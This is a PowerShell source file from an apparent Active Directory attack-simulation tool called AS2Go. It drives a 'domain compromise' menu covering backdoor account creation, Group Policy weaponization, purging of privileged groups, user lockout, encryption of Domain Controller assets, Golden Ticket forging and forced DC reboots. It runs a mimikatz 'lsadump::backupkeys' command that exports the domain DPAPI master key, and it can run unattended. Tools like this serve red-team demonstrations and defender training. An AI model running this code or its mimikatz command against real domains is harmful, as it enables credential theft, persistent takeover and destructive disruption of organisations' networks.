Private/Start-Phase12DomainCompromise.ps1
|
function Start-Phase12DomainCompromise { ################################################################################ ##### ##### ##### Phase 12 Domain Comprommise ##### ##### ################################################################################ $CurrentFunction = Get-FunctionName Write-Log -Message "### Start Function $CurrentFunction ###" $StartRunTime = (Get-Date).ToString($Script:DateFormatLog) #################### main code | out- host ##################### Do { Invoke-Output -Type Header -Message "Domain Dominance & Persistence - Select the final operation:" # Write-Host " S " -ForegroundColor Yellow -NoNewline; Write-Host "- to show Services and Processes on Logon Server`n" Write-Host " B " -ForegroundColor Yellow -NoNewline; Write-Host "- Establish persistent domain access through a covert backdoor account" Write-Host " T " -ForegroundColor Yellow -NoNewline; Write-Host "- Weaponize Group Policy Template (GPT) files for domain-wide compromize" Write-Host " P " -ForegroundColor Yellow -NoNewline; Write-Host "- Purge all privileged group memberships to grant exclusive control to the backdoor account" Write-Host " U " -ForegroundColor Yellow -NoNewline; Write-Host "- Disable user accounts or enforce password resets (retain backdoor control)" Write-Host " E " -ForegroundColor Yellow -NoNewline; Write-Host "- Encrypt critical Domain Controller assets for strategic leverage" Write-Host " K " -ForegroundColor Yellow -NoNewline; Write-Host "- Extract the DPAPI master key for credential and secret recovery" -NoNewline; Write-Host " **" -ForegroundColor Yellow Write-Host " L " -ForegroundColor Yellow -NoNewline; Write-Host "- Forge a Golden Ticket to achieve unrestricted Kerberos dominance" -NoNewline; Write-Host " **" -ForegroundColor Yellow Write-Host " R " -ForegroundColor Yellow -NoNewline; Write-Host "- Trigger coordinated reboot across accessible Domain Controllers" Write-Host "`n X " -ForegroundColor Yellow -NoNewline; Write-Host "- Exit AS2Go" If ($UnAttended) { $answer = $yes } else { $question = "Enter or confirm your attack here! Default " $answer = Get-Answer -question $question -defaultValue $NextStep } switch ($answer) { "B" { If (-not $SkipClearHost) { Clear-Host } Invoke-Output -T Header -M "Create a backdoor account with elevated group memberships for persistence" If ($UnAttended) { $answer = $yes } else { $answer = Show-DecisionPrompt } If ($answer -eq $yes) { New-BackDoorUser If ($UnAttended) { Start-Sleep 2 } else { Pause } } $NextStep = "T" $repeat = $yes } "P" { If (-not $SkipClearHost) { Clear-Host } Invoke-Output -T Header -M "Purge all privileged group memberships" $answer = $yes If ($UnAttended) { $answer = $yes } else { } If ($answer -eq $yes) { Invoke-GroupManipulation If ($UnAttended) { Start-Sleep 2 } else { Pause } } $NextStep = "T" $repeat = $yes } "T" { If (-not $SkipClearHost) { Clear-Host } Write-Host "____________________________________________________________________`n" Write-Host " Manipulate Group Policy Templates (GPT) files " Write-Host "____________________________________________________________________`n" If ($UnAttended) { $answer = $yes } else { $question = "Do you want to run these steps - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $Yes } If ($answer -eq $yes) { # New-BackDoorUser $GPODetails = Get-GPOLinkedOnDomain # write-host $GPODetails[0] | Out-Host # write-host $GPODetails[1] | Out-Host New-GPOManipulation -ID $GPODetails[0] -name $GPODetails[1] # If ($UnAttended) { Start-Sleep 2 } else { Pause } } $NextStep = "U" $repeat = $yes } "U" { If (-not $SkipClearHost) { Clear-Host } Invoke-Output -T Header -M "Disable user accounts or/and enforce password resets" $EmojiIcon = [System.Convert]::toInt32("1F600", 16) $Smily = [System.Char]::ConvertFromUtf32($EmojiIcon) Write-host " ... will ignore your new backdoor user " -NoNewline Write-host $global:BDUser -ForegroundColor $Script:FGCHighLight -NoNewline Write-Host " - $Smily" If ($UnAttended) { $answer = $yes } else { $question = "Do you want to run these steps - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $Yes } If ($answer -eq $yes) { #$Script:ASSearchBase = Get-KeyValue -key "MySearchBase" New-UserManipulation If ($UnAttended) { Start-Sleep 2 } else { Pause } } $NextStep = "T" $repeat = $yes } "G" { If (-not $SkipClearHost) { Clear-Host } Write-Host "____________________________________________________________________`n" Write-Host " create golden ticket for an unknown user " Write-Host "____________________________________________________________________`n" If ($UnAttended) { $answer = $no } else { $question = "Do you want to run these steps - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $Yes } If ($answer -eq $yes) { #run function New-GoldenTicket } $repeat = $yes } "E" { #region Step - ran ransomware attack? #Pause If (-not $SkipClearHost) { Clear-Host } Invoke-Output -T Header -M "Encrypt critical Domain Controller assets for strategic leverage" If ($UnAttended) { $answer = $yes } else { $question = "Do you want to run this attack - Y or N? Default " #$answer = Get-Answer -question $question -defaultValue $Yes $answer = $yes } If ($answer -eq $yes) { #run functions New-RansomwareAttack -BackupShare $Script:ASOfflineDITFile If ($UnAttended) { Start-Sleep 2 } else { Pause } } #endregion Step - ran ransomware attack? $repeat = $yes } "K" { #region Step - export DATA PROTECTION API master key If (-not $SkipClearHost) { Clear-Host } Write-Host "____________________________________________________________________`n" Write-Host " try to export DATA PROTECTION API master key " Write-Host "" write-host " Attackers can use the master key to decrypt ANY secret " Write-Host " protected by DPAPI on all domain-joined machines" Write-Host "____________________________________________________________________`n" write-host "" Write-Host -NoNewline " Command: " Write-Highlight -Text ".\mimikatz.exe ", """cd $Script:DefautExfiltrationFolder"" ", """privilege::", "debug", """ ""lsadump::", "backupkeys ", "/system:", "$Script:ASDC.$Script:ASFQDN", " /export", """ ""exit""" ` -Color $fgcC, $fgcV, $fgcF, $fgcV, $fgcF, $fgcV, $fgcS, $fgcV, $fgcS, $fgcF Write-Host "" If ($UnAttended) { $answer = $yes } else { $question = "Do you want to run these steps - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $Yes } If ($answer -eq $yes) { New-Item $Script:DefautExfiltrationFolder -ItemType directory -ErrorAction Ignore Invoke-Command -ScriptBlock { .\mimikatz.exe "cd $Script:DefautExfiltrationFolder" "privilege::debug" "lsadump::backupkeys /system:$Script:ASDC.$Script:ASFQDN /export" "exit" } write-host "" Write-Host -NoNewline " Command: " Write-Highlight -Text "get-item ", "$Script:DefautExfiltrationFolder\ntds_*" ` -Color $fgcC, $fgcV Write-Host "" get-item "$Script:DefautExfiltrationFolder\ntds_*" | out-host If ($UnAttended) { Start-Sleep 2 } else { Pause } } #endregion Step - export DATA PROTECTION API master key $repeat = $yes } "R" { #Pause If (-not $SkipClearHost) { Clear-Host } Invoke-Output -T Header -M "Trigger coordinated reboot across accessible Domain Controllers" If ($UnAttended) { $answer = $yes } else { $question = "Do you want to run these steps - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $Yes } If ($answer -eq $yes) { #run functions Stop-AS2GoDemo -NextStepReboot $yes Restart-VictimMachines } $repeat = $yes } "S" { If (-not $SkipClearHost) { Clear-Host } Write-Host "____________________________________________________________________`n" Write-Host " Show Services and Processes on Logon Server " Write-Host "____________________________________________________________________`n" $server = $env:LOGONSERVER.replace("\", "") Write-Host -NoNewline " Commands: " Write-Highlight -Text " Get-Service ", "-ComputerName ", "$server ", "| " , "Out-GridView ", "-Title " , "Services on $server"` -Color $fgcC, $fgcS, $fgcV, $fgcF, $fgcC, $fgcS, $fgcV Write-Host -NoNewline " " Write-Highlight -Text " Get-Process ", "-ComputerName ", "$server ", "| " , "Out-GridView ", "-Title " , "Processes on $server"` -Color $fgcC, $fgcS, $fgcV, $fgcF, $fgcC, $fgcS, $fgcV Write-Host "" If ($UnAttended) { $answer = $no } else { $question = "Do you want to run these steps - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $Yes } If ($answer -eq $yes) { Get-Service -ComputerName $server | Sort-Object status | Out-GridView -Title "Services on $server" Get-Process -ComputerName $server | Out-GridView -Title "Processes on $server" } $repeat = $yes } "X" { $repeat = $no } default { Write-Host "out of scope" $repeat = $yes } } If (-not $SkipClearHost) { Clear-Host } } Until ($repeat -eq $no) ######################## main code ############################ $runtime = Get-RunTime -StartRunTime $StartRunTime Write-Log -Message " Run Time: $runtime [h] ###" Write-Log -Message "### End Function $CurrentFunction ###" } |